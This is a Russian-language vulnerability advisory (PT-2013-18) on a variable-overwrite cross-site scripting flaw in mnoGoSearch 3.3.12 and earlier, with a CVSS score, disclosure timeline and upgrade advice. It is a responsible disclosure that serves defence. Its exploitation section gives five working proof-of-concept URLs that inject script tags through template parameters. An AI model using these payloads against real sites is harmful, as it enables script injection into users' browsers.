PT-2013-18: Перезапись переменных в mnoGoSearch
Уязвимое ПО
mnoGoSearch
Версия: 3.3.12 и более ранняя
Ссылка:
http://www.mnogosearch.org/
Рейтинг опасности
Уровень опасности: средний
Воздействие: межсайтовое выполнение сценариев
Вектор атаки: удаленный
CVSS v2:
Base Score: 4.3
Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CVE: отсутствует
Описание программы
mnoGoSearch - универсальная поисковая система для локальных и глобальных серверов.
Описание уязвимости
Специалисты исследовательского центра компании Positive Technologies обнаружили уязвимость "Межсайтовое выполнение сценариев" в приложении mnoGoSearch.
Из-за некорректной архитектуры приложения все переменные шаблона и переменные, переданные клиентом, хранятся в одном списке. Это позволяет перезаписать любые неинициализированные параметры, используемые в шаблоне. Перезапись параметров, отображаемых на странице без предварительной обработки, приводит к множественным уязвимостям типа "Межсайтовое выполнение сценариев".
Пример эксплуатации
http://www.mnogosearch.org/search/index.html?q=x&STORED=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://www.mnogosearch.org/search/index.html?q=x&CL=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://www.mnogosearch.org/search/index.html?q=a&cc=1&Charset=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://www.mnogosearch.org/search/index.html?q=a&ResultContentType=text/html%0A%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://www.mnogosearch.org/search/index.html?q=aaa&total=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&a=a
Решение
Установите последнюю версию приложения.
Статус уведомления
15.02.2013 - Производителю отправлены детали уязвимости
01.03.2013 - Производитель выпустил исправление
05.03.2013 - Публикация уязвимости
Благодарности
Уязвимость обнаружил Сергей Бобров (Исследовательcкий центр Positive Research компании Positive Technologies)
Ссылки
http://www.securitylab.ru/lab/PT-2013-18
http://www.mnogosearch.org/bugs/index.php?id=4819
Список отчетов о ранее обнаруженных уязвимостях Positive Research:
http://www.ptsecurity.ru/lab/advisory/
http://www.securitylab.ru/lab/